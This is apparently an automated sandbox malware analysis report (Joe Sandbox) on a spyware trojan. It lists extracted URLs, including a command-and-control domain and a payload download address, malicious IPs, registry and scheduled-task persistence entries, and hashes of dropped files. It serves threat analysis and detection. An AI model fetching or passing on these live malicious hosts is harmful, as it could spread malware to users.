https://www.zhihu.com/	firefox.exe, 0000001C.00000003.3244021428.000001F4C8BD2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3409616699.000004D6E5300000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3412664948.000016C1A2200000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3352798382.000001F4C6669000.00000004.00000800.00020000.00000000.sdmp	false
http://x1.c.lencr.org/0	1c8dd6ecf9.exe, 0000000E.00000003.3734149634.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3397624945.000001F4CEACF000.00000004.00000800.00020000.00000000.sdmp	false
http://x1.i.lencr.org/0	1c8dd6ecf9.exe, 0000000E.00000003.3734149634.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3397624945.000001F4CEACF000.00000004.00000800.00020000.00000000.sdmp	false
https://infra.spec.whatwg.org/#ascii-whitespace	firefox.exe, 0000001C.00000002.3400899676.000001F4CEC03000.00000004.00000800.00020000.00000000.sdmp	false
https://bugzilla.mozilla.org/show_bug.cgi?id=1539075asyncAppend	firefox.exe, 0000001C.00000003.3244944098.000001F4C8867000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3376470000.000001F4C8867000.00000004.00000800.00020000.00000000.sdmp	false
https://duckduckgo.com/?t=ffab&q=	firefox.exe, 0000001C.00000002.3352472754.000001F4C652B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3376470000.000001F4C8867000.00000004.00000800.00020000.00000000.sdmp	false
https://support.mozilla.org/products/firefoxgro.all	1c8dd6ecf9.exe, 0000000E.00000003.3738663916.0000000005C3D000.00000004.00000800.00020000.00000000.sdmp	false
https://grannyejh.lat/9	1c8dd6ecf9.exe, 0000000A.00000002.3187229462.0000000001128000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000A.00000003.3178194377.0000000001118000.00000004.00000020.00020000.00000000.sdmp	false
https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings2	firefox.exe, 0000001C.00000002.3384980497.000001F4C9C03000.00000004.00000800.00020000.00000000.sdmp	false
https://mail.yahoo.co.jp/compose/?To=%s	firefox.exe, 0000001C.00000002.3340270619.000001F4C2E7C000.00000004.00000800.00020000.00000000.sdmp	false
https://contile.services.mozilla.com/v1/tiles	firefox.exe, 0000001C.00000002.3400687379.000001F4CEBE8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.3242027640.000001F4CEB9D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3399651010.000001F4CEB9D000.00000004.00000800.00020000.00000000.sdmp	false
https://www.amazon.co.uk/	firefox.exe, 0000001C.00000003.3244944098.000001F4C8867000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3376470000.000001F4C8867000.00000004.00000800.00020000.00000000.sdmp	false
https://monitor.firefox.com/user/preferences	firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	false
https://screenshots.firefox.com/	firefox.exe, 0000001C.00000003.3140571050.000001F4C6600000.00000004.00000800.00020000.00000000.sdmp	false
https://gpuweb.github.io/gpuweb/	firefox.exe, 0000001C.00000003.3242565379.000001F4CE966000.00000004.00000800.00020000.00000000.sdmp	false
https://firefox-source-docs.mozilla.org/remote/Security.html	firefox.exe, 0000001C.00000002.3342111899.000001F4C3100000.00000002.00000001.00040000.0000001C.sdmp, firefox.exe, 0000001C.00000002.3340270619.000001F4C2E45000.00000004.00000800.00020000.00000000.sdmp	false
https://grannyejh.lat/0	1c8dd6ecf9.exe, 00000008.00000002.3053570593.000000000157E000.00000004.00000020.00020000.00000000.sdmp	false
https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/tracking-content-report	firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	false
https://grannyejh.lat/G	1c8dd6ecf9.exe, 0000000E.00000003.3455389539.00000000010B3000.00000004.00000020.00020000.00000000.sdmp	false
https://www.wykop.pl/	firefox.exe, 0000001C.00000002.3409616699.000004D6E5300000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3412664948.000016C1A2200000.00000004.00000800.00020000.00000000.sdmp	false
https://vk.com/	firefox.exe, 0000001C.00000003.3244021428.000001F4C8BD2000.00000004.00000800.00020000.00000000.sdmp	false
https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsingTrying	firefox.exe, 0000001C.00000002.3348433206.000001F4C4360000.00000002.08000000.00040000.00000000.sdmp	false
https://grannyejh.lat/D	1c8dd6ecf9.exe, 00000008.00000003.3052435278.00000000015F3000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 00000008.00000002.3053926843.00000000015F5000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 00000008.00000003.3052530538.00000000015F4000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.16/steam/random.exe:	1c8dd6ecf9.exe, 0000000E.00000003.4508866474.0000000001123000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000E.00000003.4415308381.0000000001123000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000E.00000003.4509197578.0000000001123000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000E.00000003.4509426428.0000000001123000.00000004.00000020.00020000.00000000.sdmp	false
https://www.olx.pl/	firefox.exe, 0000001C.00000002.3409616699.000004D6E5300000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3412664948.000016C1A2200000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3352798382.000001F4C6669000.00000004.00000800.00020000.00000000.sdmp	false
https://grannyejh.lat/api(	1c8dd6ecf9.exe, 0000000A.00000003.3178194377.00000000010FE000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000A.00000002.3187229462.00000000010FE000.00000004.00000020.00020000.00000000.sdmp	false
https://xhr.spec.whatwg.org/#sync-warningThe	firefox.exe, 0000001C.00000002.3348433206.000001F4C4360000.00000002.08000000.00040000.00000000.sdmp	false
https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-4	firefox.exe, 0000001C.00000002.3348433206.000001F4C4360000.00000002.08000000.00040000.00000000.sdmp	false
https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-2	firefox.exe, 0000001C.00000002.3348433206.000001F4C4360000.00000002.08000000.00040000.00000000.sdmp	false
https://mail.inbox.lv/compose?to=%s_injectDefaultProtocolHandlersIfNeededhttps://poczta.interia.pl/m	firefox.exe, 0000001C.00000002.3340270619.000001F4C2E7C000.00000004.00000800.00020000.00000000.sdmp	false
https://github.com/google/closure-compiler/issues/3177	firefox.exe, 0000001C.00000002.3400899676.000001F4CEC03000.00000004.00000800.00020000.00000000.sdmp	false
https://grannyejh.lat/Q	1c8dd6ecf9.exe, 0000000E.00000003.4074328959.0000000001111000.00000004.00000020.00020000.00000000.sdmp	false
https://www.google.com/complete/	firefox.exe, 0000001C.00000003.3242027640.000001F4CEB9D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3399651010.000001F4CEB9D000.00000004.00000800.00020000.00000000.sdmp	false
https://grannyejh.lat/N	1c8dd6ecf9.exe, 0000000E.00000003.3455389539.00000000010B3000.00000004.00000020.00020000.00000000.sdmp	false
https://grannyejh.lat/api5	1c8dd6ecf9.exe, 0000000A.00000003.3178194377.00000000010FE000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000A.00000002.3187229462.00000000010FE000.00000004.00000020.00020000.00000000.sdmp	false

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.215.113.43	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
172.217.19.228	www.google.com	United States	15169	GOOGLEUS	false
172.67.179.109	grannyejh.lat	United States	13335	CLOUDFLARENETUS	true
185.215.113.16	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
142.250.181.110	youtube.com	United States	15169	GOOGLEUS	false
34.107.221.82	prod.detectportal.prod.cloudops.mozgcp.net	United States	15169	GOOGLEUS	false
35.244.181.201	prod.balrog.prod.cloudops.mozgcp.net	United States	15169	GOOGLEUS	false
34.117.188.166	contile.services.mozilla.com	United States	139070	GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
185.215.113.206	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
142.250.181.46	plus.l.google.com	United States	15169	GOOGLEUS	false
35.190.72.216	prod.classify-client.prod.webservices.mozgcp.net	United States	15169	GOOGLEUS	false
31.41.244.11	unknown	Russian Federation	61974	AEROEXPRESS-ASRU	false

Private

IP
192.168.2.6
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1578136
Start date and time:	2024-12-19 10:08:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 20m 39s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	50
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@120/55@77/15
EGA Information:	Successful, ratio: 80%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Max analysis timeout: 600s exceeded, the analysis took too long
Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 192.229.221.95, 199.232.214.172, 216.58.208.227, 64.233.162.84, 172.217.19.206, 142.250.181.142, 172.217.17.67, 142.250.181.106, 172.217.19.10, 142.250.181.138, 172.217.19.170, 142.250.181.10, 172.217.19.202, 216.58.208.234, 172.217.21.42, 142.250.181.42, 172.217.17.74, 172.217.19.234, 142.250.181.74, 172.217.17.42, 64.233.164.84, 88.221.134.155, 13.107.246.63, 20.109.210.53, 23.218.208.109, 20.190.181.5, 13.89.179.12, 40.79.173.40
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, clientservices.googleapis.com, aus5.mozilla.org, a19.dscg10.akamai.net, clients2.google.com, ocsp.digicert.com, us-west1.prod.sumo.prod.webservices.mozgcp.net, login.live.com, firefox.settings.services.mozilla.com, aspecteirs.lat, www.youtube.com, www.gstatic.com, normandy-cdn.services.mozilla.com, star-mini.c10r.facebook.com, treehoneyi.click, fs.microsoft.com, shavar.prod.mozaws.net, github.com, raw.githubusercontent.com, ogads-pa.googleapis.com, dyna.wikimedia.org, normandy.cdn.mozilla.net, youtube-ui.l.google.com, reddit.map.fastly.net, shavar.services.mozilla.com, umwatson.events.data.microsoft.com, clients.l.google.com, location.services.mozilla.com, cheapptaxysu.click, www.reddit.com, services.addons.mozilla.org, ciscobinary.openh264.org, lossekniyyt.click, incoming.telemetry.mozilla.org, prod.content-signature-chains.prod.webservices.mozgcp.net, support.mozilla.org, redirector.gvt1.com, push.services.mozilla.com, safebrowsing.go
Execution Graph export aborted for target 1c8dd6ecf9.exe, PID 6080 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryDirectoryFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
04:10:01	API Interceptor	16443603x Sleep call for process: skotes.exe modified
04:10:14	API Interceptor	1879658x Sleep call for process: 1c8dd6ecf9.exe modified
04:10:46	API Interceptor	60614x Sleep call for process: 6523f73121.exe modified
04:11:03	API Interceptor	1x Sleep call for process: 1fa18d372f.exe modified
10:08:59	Task Scheduler	Run new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
10:10:16	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 1c8dd6ecf9.exe C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe
10:10:25	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 1c8dd6ecf9.exe C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe
10:10:34	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 6523f73121.exe C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe
10:10:42	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run dfa5c95181.exe C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe
10:10:51	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 4fe110f830.exe C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe
10:11:04	Task Scheduler	Run new task: Intel_PTT_EK_Recertification path: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
10:11:04	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 6523f73121.exe C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe
10:11:13	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run dfa5c95181.exe C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe
10:11:21	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 4fe110f830.exe C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe
10:12:35	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 99c983e4c0.exe C:\Users\user\AppData\Local\Temp\1017491001\99c983e4c0.exe
10:12:38	Task Scheduler	Run new task: ServiceData4 path: C:\Users\user\AppData\Local\Temp\/service123.exe
10:12:44	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 58812120a7.exe C:\Users\user\AppData\Local\Temp\1017492001\58812120a7.exe
10:12:52	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run bf81d9baa3.exe C:\Users\user\AppData\Local\Temp\1017493001\bf81d9baa3.exe
10:13:00	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run fea2236f42.exe C:\Users\user\AppData\Local\Temp\1017494001\fea2236f42.exe
10:13:09	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 99c983e4c0.exe C:\Users\user\AppData\Local\Temp\1017491001\99c983e4c0.exe
10:13:17	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 58812120a7.exe C:\Users\user\AppData\Local\Temp\1017492001\58812120a7.exe
10:13:25	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run bf81d9baa3.exe C:\Users\user\AppData\Local\Temp\1017493001\bf81d9baa3.exe
10:13:33	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run fea2236f42.exe C:\Users\user\AppData\Local\Temp\1017494001\fea2236f42.exe

Process:	C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8745947603342119
Encrypted:	false
SSDEEP:	96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
MD5:	378391FDB591852E472D99DC4BF837DA
SHA1:	10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
SHA-256:	513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
SHA-512:	F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\ECBGHCGC

Download File

Process:	C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136471148832945
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
MD5:	37B1FC046E4B29468721F797A2BB968D
SHA1:	50055EF1C50E4C1A7CCF7D00620E95128E4C448B
SHA-256:	7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
SHA-512:	1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EHJKKKFIIJJKJKFIECBF

Download File

Process:	C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IECGHJKK

Download File

Process:	C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1239949490932863
Encrypted:	false
SSDEEP:	384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
MD5:	271D5F995996735B01672CF227C81C17
SHA1:	7AEAACD66A59314D1CBF4016038D3A0A956BAF33
SHA-256:	9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
SHA-512:	62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\4fe110f830.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	226
Entropy (8bit):	5.360398796477698
Encrypted:	false
SSDEEP:	6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
MD5:	3A8957C6382192B71471BD14359D0B12
SHA1:	71B96C965B65A051E7E7D10F61BEBD8CCBB88587
SHA-256:	282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
SHA-512:	76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\409e5a72-ff79-4363-81de-5cc440c5bc27.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	44914
Entropy (8bit):	6.095133143351777
Encrypted:	false
SSDEEP:	768:+DXzgWPsj/qlGJqIY8GB4kWfEi1zNtkhvoNNi5sUFyKKJDSgzMMd6qD47u3+CioC:+/Ps+wsI7yn/vscKtSmd6qE7lFoC
MD5:	A8D302B95AEAC47D3A7E64FE87FC126C
SHA1:	BE803CA1191DEFB0245254553B9110C3F9EA6976
SHA-256:	43C01717163D89505670009344568AAE4DDD5182F2CA23A94C3E3342402BC352
SHA-512:	4073D3F9D1CEC6334854F7AD0F0D64E9DA6EF68CAD070D9B9D256388174BDD65D9CAAFD78DA9D593AF3086CFD6D17058CD8EDCDCDDABCFBA3F6187DE3E32558A
Malicious:	false
Reputation:	unknown
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\49b26663-a86c-4bad-aadb-449df54032a3.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	42022
Entropy (8bit):	6.090711650277239
Encrypted:	false
SSDEEP:	768:+DXzgWPsj/qlGJqIY8GB4kWuai1zNtPN3biRJDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynbGtSmd6qE7lFoC
MD5:	BEEEDA4645B7B569F59E5224602DBE98
SHA1:	78B27568F79E40D05E527ABB8841ACB90AAE9287
SHA-256:	F2F1C5C6B19A7AEB39073DB39C28673DE2E61F15E6054EC45A5A0A8C0E98FD78
SHA-512:	EC0884D98C503A8AD0A51F7A6012163E017B93A6FB7E96DE946B65921C6CA6179AD5C794BB6B9EE18EC5D632A792D044D7F08B70F3CBA83B476677418B68F5E2
Malicious:	false
Reputation:	unknown
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\5c8d2684-e95f-47ed-8d27-42ce0756c6f5.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	42022
Entropy (8bit):	6.090711650277239
Encrypted:	false
SSDEEP:	768:+DXzgWPsj/qlGJqIY8GB4kWuai1zNtPN3biRJDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynbGtSmd6qE7lFoC
MD5:	BEEEDA4645B7B569F59E5224602DBE98
SHA1:	78B27568F79E40D05E527ABB8841ACB90AAE9287
SHA-256:	F2F1C5C6B19A7AEB39073DB39C28673DE2E61F15E6054EC45A5A0A8C0E98FD78
SHA-512:	EC0884D98C503A8AD0A51F7A6012163E017B93A6FB7E96DE946B65921C6CA6179AD5C794BB6B9EE18EC5D632A792D044D7F08B70F3CBA83B476677418B68F5E2
Malicious:	false
Reputation:	unknown
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\8177623a-643f-46c6-b2e7-9db51bec5600.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44455
Entropy (8bit):	6.089762246066807
Encrypted:	false
